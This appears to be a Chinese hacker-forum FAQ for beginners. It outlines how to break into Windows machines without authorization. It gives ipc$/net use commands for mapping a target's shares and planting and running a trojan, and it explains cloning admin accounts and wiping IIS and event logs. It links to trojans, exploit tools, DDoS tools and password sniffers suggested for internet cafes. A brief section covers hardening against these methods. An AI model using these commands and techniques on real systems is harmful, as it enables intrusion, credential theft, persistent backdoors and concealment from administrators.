为了保证服务器的正常工作,现在只有认证会员才能使用搜索功能。另外,认证会员还有资格进入“永远的灰色轨迹”版。要想成为认证会员并不难,但也不简单。你应该努力提高自己,积极帮助别人,多发有质量的帖子(包括提问和回答)。如果你真心融入论坛大家庭,你得到的将绝不仅仅是一个认证资格。
相关帖子:
关于认证问题的讨论:
http://www.sandflee.net/cgi-bin/lb5…=10485&show=352
关于被入侵
简单说明:
经常有帖子说:“我中xx木马啦,怎么办?”、“我的windows有问题,是不是被入侵啦?”等等。通用的做法是查看可疑进程(win98需要用相关工具)、注册表启动项、服务、开放端口等,然后更新病毒库,杀毒。前提是你要有一定的电脑常识并对你的系统比较了解,才能分别正常与否。如果你自己对电脑一窍不通,那在论坛别人也很难帮助你。其实就像对付现实中的病毒一样,应该预防为主。杀毒软件和网络防火墙可以抵御绝大部分危险,自身安全知识的提高则是最根本的保障。最新的病毒相关知识可以到杀毒软件公司的主页上找。另外,系统不正常也可能是..作失误引起的。这里是“黑客零起点”不是“电脑零起点”,所以关于系统修复的问题,请不要在论坛提了。
相关工具:
Active Ports 监视自己电脑的端口
http://www.isgrey.com/down/show.asp?id=215&down=1
windows优化大师4.9 它的进程管理功能不错
http://gwbn.onlinedown.net/down/wom49.exe
Fport-2.0 查看端口关联的进程
http://www.heibai.net/download/show.php?id=2670&down=1
mport 比fport更胜一筹的工具
http://www.sandflee.net/down/show.asp?id=247&down=1
相关帖子:
关于广外女生木马的手工清除方法 http://www.sandflee.net/txt/list.asp?id=128
把灰鸽子赶尽杀绝 http://www.sandflee.net/txt/list.asp?id=181
清除恶意网页的破坏 http://it.rising.com.cn/default/spclean.htm
http://it.rising.com.cn/default/clean.htm
对付win2kpass
http://www.sandflee.net/cgi-bin/lb5…=10401&show=396
2000系统进程总列表
http://www.sandflee.net/cgi-bin/lb5…c=9268&show=748
木马的检测、清除及其预防
http://www.s8s8.net/cgi-bin/topic.c…ic=17013&show=0
__________________
暴风雨来临之前天空永远都是宁静的!
http://bbs.thugx.com:81/iB_html/uploads/post-10-96668-logo.gif
电脑和网络知识可算是做黑客的基础的基础,至少你要先了解了它们再来看下面的帖子。看完这部分的帖子,你也只是算站到了“零起点”上,路还长着呢。这里我再多说几句关于入侵步骤的话,给新手做个引导。所谓入侵,可以理解为未授权的访问。既然是未授权的,就需要借助一些非常规的手段,即通常所说的利用漏洞。
1,要利用漏洞首先要发现它。端口扫描和漏洞扫描就是“敲门砖”。可以对大量目标做一般扫描,也可以对单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时,你可以只通过端口扫描就能了解目标的可能有的漏洞。这样既提高效率又不易被记录..志。
2,找到漏洞后的利用问题,是千差万别的。这正是新手学要学习的地方之一。这里就不多说了。
3,利用漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是指与..作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。
4,shell是有权限差别的。最高权限——管理员权限才是我们的目标。所以有时会有提升权限的问题。当然,这也是利用了漏洞。
5,有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了“怎么开3389”,“怎么上传”之类问题。
6,为了下次还能控制目标,你需要保持shell。做一个好的后门又是一种“学问”。克隆帐号、埋木马、破administrator的密码,手段不一而足。各位慢慢学吧。
相关帖子:
如何成为一名黑客 http://www.sometips.com/tips/security/186.htm
提问的技巧http://www.sandflee.net/cgi-bin/lb5…rum=1&topic=523
TCP/IP基础介绍 http://article.cnhope.org/list.asp?id=659
网络攻防教程 http://www.netsill.com/wenzhang/list.asp?id=115
网络入侵步骤及思路
http://www.s8s8.net/cgi-bin/topic.c…=14970&show=140
几种扫描器的使用教程 http://www.chinesehack.org/file/show.asp?id=5614
全球ip分配表http://www.sandflee.net/cgi-bin/lb5…4&start=0&show=
黑客入门教程 http://www.heibai.net/article/show.php?id=2515
关于命令的使用
简单说明:
windowsNT/2000下有丰富的cmd可供使用,其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身就提供了详细的命令帮助。在开始菜单–》帮助中可以搜索到“windows
2000
命令参考”。强烈建议各位新手花些时间仔细看一遍。装了比如IIS等软件,就会有新的命令(iisreset),在命令行方式下加/?或-h参数可以查看帮助,其他内置的命令当然也可以。
相关帖子:
ftp命令:http://www.sandflee.net/cgi-bin/lb5…pic=227&show=75
telnet命令: http://www.heibai.net/article/show.php?id=578
net命令: http://www.sandflee.net/txt/list.asp?id=143
tftp命令:http://www.sandflee.net/cgi-bin/lb5…orum=3&topic=32
一般入侵所需要的几个常用命令
http://www.sandflee.net/cgi-bin/lb5…um=1&topic=4242
关于端口
相关工具:
扫描端口是扫描器的基本功能,工具太多了。看后面的“常用工具的使用”这部分。
相关帖子:
端口扫描简介http://www.s8s8.net/cgi-bin/topic.c…c=15063&show=60
常见端口一览表http://www.s8s8.net/cgi-bin/topic.c…=25&topic=14801
常见端口详解及部分攻击策略 http://www.sandflee.net/txt/list.asp?id=116
关于windows98
简单说明:
这类问题有两种:一是怎样入侵win98系统,二是在win98怎样入侵。
由于98对网络的支持不完善,使得问题的解决远没有像对2000那样“丰富多采”。98默认没有什么网络服务启动,也就找不到什么可利用的漏洞。共享算是最常见的“服务”了。我简单的写了些利用方法放在这里:
http://home.getdns.net/web/eva/98.txt
其他还有些方法,比如嗅探密码、发病毒和木马到信箱、甚至用QQ“联络感情”再传个绑木马的Flash等,没什么意思,就此打住。
基于同样的理由,98不是一个好的攻击平台。如果只是端口扫描,那么superscan可以胜任。web类的漏洞扫描x-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务(如sql)就要“基于NT技术构建”的os了。好在3389终端服务的客户端可以是98,所以先搞一台开3389的肉鸡就算是回避了问题。如果你还在用98,诚恳的建议你:请用2000。如果你在网吧,先试试入侵网吧服务器。
鉴于98的问题技术含量不高、没有深入探讨价值,所以如果不是特别的问题就请不用发帖了。(个人观点)
相关工具:
NetPass 1.0 破解98共享密码
http://www.heibai.net/download/show.php?id=1465&down=1
cain v2.5 综合破解工具
http://www.heibai.net/download/show.php?id=2585&down=1
exeBinderZ 1.3 EXE捆绑机 (我用PE压了一下,暂时不会被杀了)
http://www.v86.net/net/file/zzzevazzz/exeBinderZ1.3.zip
关于破解邮箱
相关工具:
溯雪 http://www.netxeyes.org/dansnowb7setup.exe
溯雪中文补丁 http://www.netxeyes.org/dansnowb7_cn.zip
(先安装英文版,释放到原英文版目录即可)
相关帖子:
溯雪破解21cn信箱的完整教程
http://www.heibai.net/download/show.php?id=1263
关于解除网吧、网页限制
破解右键:http://www.sandflee.net/cgi-bin/lb5…=2215&show=1078
破解硬盘还原卡: http://www.heibai.net/article/show.php?id=2488
http://www.heibai.net/article/show.php?id=1939
破解美屏: http://article.cnhope.org/list.asp?id=574
http://www.heibai.net/article/show.php?id=2546
相关网址: http://webmaster.diy.163.com/cy07/
相关工具: 网吧幽灵1.8
http://www.heibai.net/download/show.php?id=2847&down=1
关于流光
简单说明:
流光实在是个十分出色的综合工具。其易用性和实用性都很适合新手使用。还没用过的立刻下载一个装上,自己体验一下吧。使用前建议看看自带的说明。
相关工具:
流光4.7 http://www.netxeyes.org/fluxay47/fl…ld3200setup.exe
流光4.7破解补丁 http://www.heibai.net/download/show.php?id=2422
常见问题和回答:
1,我下载的流光杀毒软件说有病毒,怎么会事?
答:一些杀毒软件的确认为流光是木马(谁让它这么有名呢,呵呵)。如果杀毒,流光将无法使用,所以只有让杀毒软件停止监测。或者使用不认为流光是病毒的软件,比如金山毒霸。
2,为什么有些肉鸡安装sensor失败?
答:如果拷贝文件出错,可能是因为目标admin$共享未开放。请采用其他shell,在目标主机上执行net share
admin$命令。
如果启动服务失败,可能因为使用的端口已经被占用,换个试试;也可能目标有杀毒软件删除了文件,或者有防火墙阻止sensor连网,没有什么好的解决办法。
3,为什么一些流光扫到的密码不能用?
答:可能是误报,将扫描速度降低些再扫。对于winxp目标,也会产生误报。也可能因为你用扫到的非管理员帐号来连接目标,请在ipc$扫描选项里将“只对administrators组进行猜解”选上。
关于字典
简单说明:
..作系统将用户和密码信息加密后存放在特定的地方和文件中。典型的如windowsNT里的sam文件和Linux里的etc/passwd。由于加密算法是单向散列的,所以几乎不可能找到逆向算法。因此,不得不使用同样的算法加密各种口令,将结果去吻合散列值。字典就是有选择地储存了一批口令的文件。例如生..、常用单词、中文名字的拼音等。著名的破解密码的工具,一般自带一些字典。也可以使用字典工具制作符合要求的字典。
相关工具:
乱刀 小榕出品,破解UNIX系统的密码 http://www.netxeyes.org/bladese.exe
john 最著名的UNIX密码破解工具(windows版)
http://www.heibai.net/download/show.php?id=1595&down=1
producepass 通用字典生成器
http://www.heibai.net/download/show.php?id=2666&down=3
hh_dictall 英文单词大全字典
http://www.heibai.net/download/show.php?id=396&down=1
sr-password 生..密码生成器
http://www.heibai.net/download/show.php?id=2442&down=1
关于ipc$、空连接和默认共享
简单说明:
首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
相关帖子:
尝试自己解决问题的学习思路 http://www.sandflee.net/txt/list.asp?id=100
IPC进攻方法http://www.sandflee.net/cgi-bin/lb5…=2498&show=1034
__________________
暴风雨来临之前天空永远都是宁静的!
http://bbs.thugx.com:81/iB_html/uploads/post-10-96668-logo.gif
1,怎样建立空连接,它有什么用?
答:使用命令 net use \\IP\ipc$ “” /user:””
就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就看看“专业”的解释吧:
在NT/2000下的空连接
http://www.3389.net/bbs/dispbbs.asp…D=3424&page=1:
解剖WIN2K下的空会话 http://www.sandflee.net/txt/list.asp?id=117
2,为什么我连不上IPC$?
答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2,确认你的命令没有打错。正确的命令是: net use \\目标IP\ipc$ “密码” /user:”用户名”
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用””表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突: 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动: 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,本论坛没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结论,十分棘手。
而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。
各位看着办吧,呵呵。
3,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令
net share ipc$
来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
4,怎样映射和访问默认共享?
答:使用命令 net use z: \\目标IP\c$ “密码” /user:”用户名”
将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe
\\IP\d$\path\muma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \\IP\d$
。然后 copy muma.exe y:\path\muma.exe 。当路径中包含空格时,须用””将路径全引住。
5,如何删除映射和ipc$连接?
答:用命令 net use \\IP\ipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
6,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
7,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止建立空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的键值改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里:
过配置本地策略来禁止139/445端口的连接
http://www.sandflee.net/txt/list.asp?id=98 关于扫描出的漏洞
简单说明:
很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时,不要急着把它们帖在论坛上,期望别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,一部分漏洞过时了,一部分是误报。
漏洞搜索:
绿盟的引擎 http://security.nsfocus.com/index.php?act=sec_bug
补天网的引擎 http://www.patching.net/otherweb/leak/leakindex.asp
小凤居的引擎 http://www.chinesehack.org/file/list.asp?type=2
相关帖子:
CGI漏洞描述 http://www.sandflee.net/txt/list.asp?id=37
IIS ISAPI Printer远程溢出攻击
http://www.sandflee.net/txt/list.asp?id=66
如何利用UNICODE漏洞 http://www.heibai.net/article/show.php?id=2638
Apache HTTP server存在严重漏洞
http://www.sandflee.net/txt/list.asp?id=161
msadcs.dll漏洞的使用方法 http://www.sandflee.net/txt/list.asp?id=115
相关工具:
IISIDQ Snake的IDQ溢出攻击程序
http://www.heibai.net/download/show.php?id=223&down=1
IIS .ida映射溢出程序
http://www.heibai.net/download/show.php?id=1508&down=1
__________________
暴风雨来临之前天空永远都是宁静的!
http://bbs.thugx.com:81/iB_html/uploads/post-10-96668-logo.gif
经典的黑客目标就是得到root(即win中的admin)权限。有些漏洞(典型的如Unicode漏洞、ASP木马)不能直接获得管理员权限,所以必然需要提升权限。一些新手可能会犯这类错误,以为中了木马、获得了shell就能控制一切。结果就出现“为何不能加用户”、“为何不能开3389”等问题。2000及更高版本os承袭了NT的安全结构,多重机制环环相扣来保障安全,特别是帐户安全。无奈安全系统过于庞大,多少会出现漏洞,于是我们就有机会了。
相关工具:
erunasx 利用Debug Registers漏洞提升权限
http://www.sandflee.net/down/show.asp?id=118&down=1
自带说明。需要指出的是,它的原理决定了它只能使用一次,不成功(比如打错了字)就必须重起目标,才能再来。
PipeUpAdmin 对sp1及更低有效
http://www.sandflee.net/down/show.asp?id=25&down=1
ISPC 利用IIS的漏洞,详见自带说明
http://www.heibai.net/download/show.php?id=1532&down=1
相关帖子:
NT/2000提升权限的方法小结 http://www.sandflee.net/txt/list.asp?id=62
Windows NT4的安全结构(对新手有些难,了解一下吧)
http://www.sometips.com/tips/security/184.htm 关于做代理和跳板
相关工具:
SocksCap 2.2 SOCKS调度工具
http://www.heibai.net/download/show.php?id=2410&down=1
SkSockServer1.04 代理跳板
http://www.heibai.net/download/show.php?id=1194&down=1
FTP Serv-U 4.0 最常用的ftp服务程序
http://soft.km169.net/soft/html/4237.htm
slimftp 隐蔽的ftp服务器
http://www.netsill.com/download/download.asp?Did=1981
天雁WEB服务器 不用安装的小型web服务程序
http://www.netsill.com/download/download.asp?Did=1979
相关帖子:
代理、肉鸡、跳板的概念
http://www.s8s8.net/cgi-bin/topic.c…=14803&show=300
代理服务器(Proxy)完全解析
http://www.sandflee.net/cgi-bin/lb5…um=1&topic=9092
如何使用代理服务器 http://netschool.ayinfo.ha.cn/rhsydlfwq.htm
Sockscap32 结合SnakeSkserver做跳板图解
http://www.sandflee.net/txt/list.asp?id=88
Serv-U设置教程 http://www.enanshan.com/ftp/
SocksCap32 使用详解 http://www.netsill.com/wenzhang/list.asp?id=66
关于终端服务(3389)
简单说明:
windows终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。图形界面和不影响当前本地用户的特性是它的最大优点。由于它是2000server及以上版本自带的功能,因此成为一个绝好的“后门”而倍受青睐。而且win98也可以成为客户端,这使得在网吧“工作”成为可能。
相关工具:
winxp下的客户端 功能比2000下的更强大
http://www.sandflee.net/down/show.asp?id=67&down=1
终端服务程序的一个补丁 使本地和远程间能复制文本
http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe
web版终端客户端 使用浏览器调用ActiveX控件访问终端服务
http://www.enanshan.com/down/tswebsetup.exe
C3389.EXE 修改终端服务端口号的工具
http://www.sandflee.net/down/show.asp?id=228&down=1
Win2k终端服务器端所需文件包
http://www.netsill.com/download/download.asp?Did=1965
相关帖子:
关于远程启动终端服务的帖子
http://www.s8s8.net/cgi-bin/topic.c…=25&topic=14567
终端服务问题常见问答 http://www.sandflee.net/wawa/3389qa.htm
图文讲解输入法漏洞入侵 http://www.sandflee.net/txt/list.asp?id=22
Terminal Service 远程安装
http://article.cnhope.org/list.asp?id=697
其他任何有关3389终端服务的问题都可以到专门的论坛和主页找答案:
http://www.sandflee.net/wawa/
http://www.sandflee.net/cgi-bin/lb5…ms.cgi?forum=17
请不要在其他分论坛发贴提问。
关于克隆帐号
简单说明:
克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAM\Domains\Account\Users下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况。即所谓的克隆帐号。
具体的看这里:解剖安全帐号管理器(SAM)结构
http://www.sandflee.net/cgi-bin/lb5…um=1&topic=5973
明白原理后就可以手动或者用现成的工具克隆帐号了。
相关工具:
克隆ca.exe http://www.netxeyes.org/CA.exe
检查克隆cca.exe http://www.netxeyes.org/CCA.exe
手动克隆需要SYSTEM权限,用它 psu.exe
http://www.sandflee.net/down/show.asp?id=176&down=1
相关帖子:
工具克隆:ca和cca 请访问作者主页 http://www.netxeyes.org/main.html
这里是摘录http://www.sandflee.net/cgi-bin/lb5…um=1&topic=3374
psu用法:psu.exe提升为system权限
http://www.sandflee.net/cgi-bin/lb5…um=1&topic=5638
手动克隆:如何克隆管理员帐号 http://www.sandflee.net/txt/list.asp?id=138
如何克隆管理员帐号的补充 http://www.sandflee.net/txt/list.asp?id=139
常见问题和回答:
1,使用ca时,出现connect **.**.**.** …Error是怎么会事?
答:ca和cca需要目标开放ipc$,请确认可以与目标建立ipc$。参见“关于ipc$和空连接”
2,使用ca时,出现“Processing….ERROR”是怎么会事?
答:这说明对方主机缺少文件msvcp60.dll,想办法传个过去放在系统目录下就可以了。
3,克隆过程没有错误,但cca没有显示该帐号克隆成功,无法使用被克隆的帐号。
答:这一般是因为对方主机是域控制器,注册表中sam结构不同,工具失效。暂时无法解决。
4,手动克隆无法访问注册表SAM键怎么办?
答:在命令行方式,可以使用psu工具获得SYSTEM权限,从而访问SAM键。详见上面说明。
在图形界面,运行regedt32.exe,找到SAM键并选中。“安全”子菜单栏里有一项“权限”,打开它。在里面设置administrator和SYSTEM一样有完全控制权限。关闭regedt32再打开,就可以访问SAM键了。
关于..志
简单说明:
想要做个隐身人就要把脚印擦干净。windows的许多服务都带..志。最重要和明显的就是IIS和事件..志。它们最有可能记录你的IP和行动。而且相对于其他的如ftp、计划任务、telnet的..志更为管理员重视。另外,如果你获得了图形界面的shell来用IE,还可能会留cookie。
相关工具:
cleanIISlog 清除web..志 http://www.netxeyes.org/cleaniislog.zip
elsave.exe 清除事件..志
http://www.sandflee.net/down/show.asp?id=196
RCLS.vbe 远程清除事件..志的脚本
http://www.v86.net/net/file/zzzevazzz/rcls.zip
相关帖子:
NT/2000下删..志的方法 http://www.sandflee.net/txt/list.asp?id=129
windows..志的保护与伪造 http://www.sandflee.net/txt/list.asp?id=182
关于后门和木马
相关工具:
wollf-v1.5 功能挺多的木马
http://www.isgrey.com/down/show.asp?id=144&down=1
WinShell v5.0 精巧的Telnet服务器
http://www.isgrey.com/down/show.asp?id=200&down=1
蓝色火焰V0.5 可以用IE控制的木马
http://www.bluefate.com/bluefire/bluefire050.zip
网络神偷 V3.4 反向连接,上线通知
http://www.isgrey.com/down/show.asp?id=239&down=1
HELL v0.4 Lion写的木马兼工具
http://www.heibai.net/download/show.php?id=2449&down=1
相关帖子:
蓝色火焰V0.5介绍 http://www.bluefate.com/bluefire/help.htm
网络神偷的介绍,直接去作者的主页找
http://www.greenstuffsoft.com/nethief/article.htm
__________________
暴风雨来临之前天空永远都是宁静的!
http://bbs.thugx.com:81/iB_html/uploads/post-10-96668-logo.gif
简单说明:
如果你发现肉鸡有漏洞的话,一般可以用上面提到的漏洞搜索引擎找到相应的补丁下载URL。大的补丁比如sp2就找微软要吧(windows
update)。
相关帖子:
肉鸡补丁教程http://www.sandflee.net/cgi-bin/lb5…um=1&topic=7180
相关工具:
win2000sp3中文版 http://www.cnns.net/msfix/w2ksp3_cn.exe
win2000sp3英文版 http://www.cnns.net/msfix/w2ksp3_en.exe
Windows2k安全补丁集SRP1
http://www.patching.net/otherweb/so…cle.asp?id=1570
关于telnet
简单说明:
telnet是一种命令行方式的终端服务,其优势在于客户端和服务端都是系统自带的。它是除了木马外,获得cmd下shell的最好选择。使用该服务时,最常遇到的问题就是NTLM认证方式。当NTLM=2时,要求你必须使用你系统当前的帐户和密码登陆;当NTLM=0时直接要求你输入帐户及密码进行验证;NTLM=1则是前一种要求失败后再用后一种。由于系统默认的NTLM为2,所以想用你得到的帐户登陆,要么在自己系统上也建立一个用户名密码都一样的帐户,要么想办法更改对方的NTLM。
相关工具:
telnethack 远程开启telnet服务
http://www.heibai.net/download/show.php?id=2200&down=1
RTCS.vbe 远程开telnet的脚本
http://www.v86.net/net/file/zzzevazzz/rtcs.zip
相关帖子:
最快速登录WIN2K TELNET 服务
http://www.sandflee.net/txt/list.asp?id=58
不需工具远程屏蔽telnet服务的ntlm认证
http://www.sandflee.net/cgi-bin/lb5…=8608&show=1012
关于ftp入侵
简单说明:
ftp是文件传输协议的缩写,现在一般指一种文件传输方式。要通过它入侵实在是有些勉为其难了。即使得到上传权限也无法直接执行程序,利用办法可以参考win98共享的入侵。一些较早版本的ftp服务软件,尤其是UNIX平台上的,有溢出或越权访问的漏洞,相关信息请查看后面关于漏洞的部分。
相关帖子:
允许匿名登陆ftp服务器危险性研究
http://www.heibai.net/article/show.php?id=2094
关于sql
简单说明:
sql的原意是Structured Query
Language,结构化查询语言。现一般指代数据库软件或服务。流行的数据库软件是ms-sql,一般服务器上都由它提供数据库服务。以下的讨论都是针对它的。由于具有管理员权限的帐号sa默认密码为空,且低版本的sql有漏洞能直接获得密码。因此它也成为入侵的一种捷径(如果存在漏洞的话)。用客户端工具连接后直接当cmd用吧。
相关工具:
mssqltools 攻击sql的工具集
http://www.haowawa.com/down/att/mssqltools.zip
SuperSQLEXEC mssql连接工具
http://www.sandflee.net/down/show.asp?id=142&down=1
相关帖子:
去除SA的xp_cmdshell权限 http://www.sandflee.net/txt/list.asp?id=148
dos下如何改sql密码
http://www.sandflee.net/cgi-bin/lb5…=8623&show=1034
sql扩展的删除与恢复
http://www.haowawa.com/bbs/dispbbs….ID=16971&page=1
SQL完全简明手册
http://www.patching.net/otherweb/wo…cle.asp?id=1513
关于sniffer
相关工具:
ARPSniffer 基于交换环境的Sniffer工具
http://www.netxeyes.org/ARPSniffer.rar
SnifferPRO4.6 最好的嗅探器之一
http://www.sandflee.net/down/show.asp?id=237&down=1
commview 也是嗅探器
http://www.skycn.com/download.php?i…et/down/cv3.zip
ARPKiller1.3 可以查谁在嗅探(网卡处在混杂模式)
http://www.heibai.net/download/show.php?id=2547&down=1
pswmonitor2.0 监听基于网页的邮箱密码(很适合在网吧使用)
http://www.heibai.net/download/show.php?id=2181&down=1
GUNiffer 命令行方式的嗅探工具 http://haowawa.com/down/GUNiffer.exe
相关帖子:
sniffer简述 http://www.sandflee.net/txt/list.asp?id=177
网络监听技术概览 http://www-900.ibm.com/developerWor…iff/index.shtml
NetXray使用说明总汇 http://www.heibai.net/article/show.php?id=1620
如何在交换环境下SNIFFER http://www.netxeyes.org/arpsniffer.html
Windows 交换环境下ARP Sniffer的实现
http://www.netxeyes.org/arpspoof.html
关于DoS和DDos
简单说明:
拒绝服务攻击只在很特殊的情况才有应用价值。它完全是一种破坏和令人厌恶的行为。因此十分不推荐新手尝试。各位了解一下它的原理就可以了。
相关工具:
独裁者 DDos工具 http://www.leothreads.com/usr/25/25_18196.zip
三个ddos工具
http://www.heibai.net/download/show.php?id=2706&down=1
相关帖子:
DOS攻击原理以及常见方法介绍 http://www.heibai.net/article/show.php?id=1724
典型DoS攻击原理及抵御措施 http://www.heibai.net/article/show.php?id=1523
分布式拒绝服务攻击(DDoS)原理及防范
http://www-900.ibm.com/developerWor…dos/index.shtml
DoS,DDOS(拒绝服务)攻防简明问答
http://www.chinesehack.org/file/show.asp?id=4876
独裁者(Autocrat)教程
http://www.s8s8.net/cgi-bin/topic.c…ic=17639&show=0
关于UNIX/Linux
简单说明:
UNIX/Linux无疑是比windows更历史悠久更出色的OS。可惜缺少了一些“平易近人”,让许多人望而却步。这里也不打算讲些什么,想学它的人不如从学习怎么找相关资料开始吧,呵呵。
相关帖子:
给初学者的入侵FAQ http://article.cnhope.org/list.asp?id=308
rootkit综述
http://www.patching.net/otherweb/wo…cle.asp?id=1592
相关网址:
Linux相关网站集 http://chenbol.myetang.com/remen.htm
关于常用工具的使用
简单说明:
黑客的工具就像战士的枪,一定要熟练掌握灵活应用。这里给出一些常用的工具方便新手下载。其他工具还是自己搜一下吧。一般命令行下的工具是自带简单的使用说明(即usage)的,当输入错误参数或不输参数就会显示。不要因为帮助是英文的就放弃学习。给出的软件使用教程,总会有没讲到或讲的不够细致的地方。遇到问题请首先尝试自己解决。实在不行的话,就请把握住问题的要点,清楚地表达出来。
相关工具:
命令行工具:
Shutdown.exe 远程重起的小工具
http://www.sandflee.net/down/show.asp?id=109&down=1
pstools系列工具 包括pslist,pskill,psinfo等实用的工具
http://haowawa.com/down/pstools.zip 内有英文说明,比较易懂。
SMBcrack V4 暴力破解2000共享密码
http://www.sandflee.net/down/show.asp?id=226&down=1
sc.exe 服务管理工具
http://www.sandflee.net/down/show.asp?id=31&down=1
nmap-3.00-win32 最优秀的扫描工具
http://www.heibai.net/download/show.php?id=2741&down=1
regshell 命令行方式下的交互式注册表编辑工具
http://www.sometips.com/soft/regshell.exe
ScanloOK 1.0 漏洞扫描器
http://www.chinesehack.org/down/show.asp?id=1559&down=1
Win2k.Svr.ResKit完全安装版 微软出的“黑客”工具包
http://www.ttian.net/download/show.php?id=136&down=1
NC 黑客的瑞士军刀http://www.sandflee.net/down/show.asp?id=32&down=1
图形界面工具:
superscan3.0 端口扫描,速度快
http://www.sandflee.net/down/show.asp?id=165&down=1
x-scan 2.0 综合扫描工具
http://www.sandflee.net/down/show.asp?id=236&down=1
TFTP服务器 简单的文件传输工具,利用Unicode漏洞必备
http://www.sandflee.net/down/show.asp?id=27&down=1
DameWare NT Utilities v3.62注册版 强大的远程控制软件
http://www.sandflee.net/down/show.asp?id=238&down=1
l0pht4.0 破解SAM的著名工具(带注册机)
http://www.sometips.com/soft/lc400.zip
strcm-vnc strcm自动装载VNC远程图形控制
http://www.sandflee.net/down/show.asp?id=235&down=1
Remote Administrator v2.1 远程控屏工具
http://www.sandflee.net/down/show.asp?id=204&down=1
相关帖子:
SuperScan使用详解 http://www.heibai.net/article/show.php?id=1575
使用strcm自动装载VNC远程图形控制
http://www.sandflee.net/txt/list.asp?id=176
DameWare NT Utilities 使用心得
http://www.sandflee.net/txt/list.asp?id=102
DameWare NT Utilities图文教程
http://www.sandflee.net/txt/list.asp?id=25
Remote Administrator–远程控制软件图文使用教程
http://www.sandflee.net/txt/list.asp?id=162
Remote Administrator 官方中文帮助
http://www.sandflee.net/txt/list.asp?id=165
关于 radmin 的远程安装 http://www.ttian.net/article/show.php?id=431
SC介绍和教程 http://www.sandflee.net/txt/list.asp?id=26
代理猎手(Proxy Hunter)使用教程
